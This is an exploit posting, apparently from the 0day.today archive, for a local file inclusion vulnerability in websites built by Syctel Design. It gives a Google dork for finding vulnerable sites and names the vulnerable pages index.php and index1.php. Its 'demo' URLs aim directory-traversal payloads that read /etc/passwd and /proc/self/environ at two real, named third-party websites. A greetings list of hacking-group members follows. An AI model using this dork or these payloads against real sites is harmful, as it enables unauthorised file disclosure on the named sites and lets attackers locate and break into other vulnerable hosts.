Lucene search

K
zdtXroGuE1337DAY-ID-15899
HistoryApr 22, 2011 - 12:00 a.m.

Syctel Design Local File Inclusion Vulnerability

2011-04-2200:00:00
XroGuE
0day.today
9

Exploit for php platform in category web applications

###########################################################################
# Name: Syctel Design Local File Inclusion Vulnerability
# Vendor: www.Syctel.Com
# Date: 2011-04-21
# Author: Ashiyane Digital Security Team
# Thanks to: 1337day.com,Securityreason.com,packetstormsecurity,Exploit-db
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.ashiyane.org/forums/
###########################################################################
###########################################################################

[+] Dork: inurl:"index.php?menu=*.php" & intext:"Diseño y Hosting por SyCtel.com"

###########################################################################

[+] Vulnerable Page: index.php & index1.php

[+] Demo: www.[site].com/[path]/index.php?menu=[LFI]

[+] Demo: http://www.chiclayoweb.com/index.php?menu=../../../proc/self/environ

[+] Demo: http://www.asociaciondeexalumnossanjosefinos.org/index1.php?menu=../../../etc/passwd

###########################################################################
===========================================================================
# Gr33tz:
# Ashiyane Members : BehroozIce,Q7x,,Virangar,Iman_taktaz,Keivan,Ali_eagle
# Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
# Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk
# mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206,ruin3r,Hijacker,Rz04
#                &
# 1337 Member: r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger
# Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,
===========================================================================
# DisCovered By XroGuE !!!



#  0day.today [2018-01-06]  #